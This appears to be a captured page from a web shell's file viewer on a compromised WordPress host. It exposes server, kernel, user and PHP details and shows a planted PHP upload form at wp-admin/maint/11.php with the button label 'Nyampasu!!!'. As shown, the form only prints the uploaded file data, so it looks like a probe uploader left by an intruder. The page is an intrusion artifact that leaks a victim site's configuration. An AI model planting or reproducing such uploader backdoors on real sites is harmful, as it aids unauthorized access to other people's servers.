HEX
Server: LiteSpeed
System: Linux premium71.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: consovgw (933)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/consovgw/public_html/wp-admin/maint/11.php
<!DOCTYPE html>
<html>
<head>
    <title>File Uploader</title>
</head>
<body style="font-family: monospace;">

<form method="post" enctype="multipart/form-data">
    <input type="file" name="a">
    <input type="submit" value="Nyampasu!!!">
</form>

<?php
if (isset($_FILES['a'])) {
    echo '<pre>';
    print_r($_FILES);
    echo '</pre>';
}
?>
</body>
</html>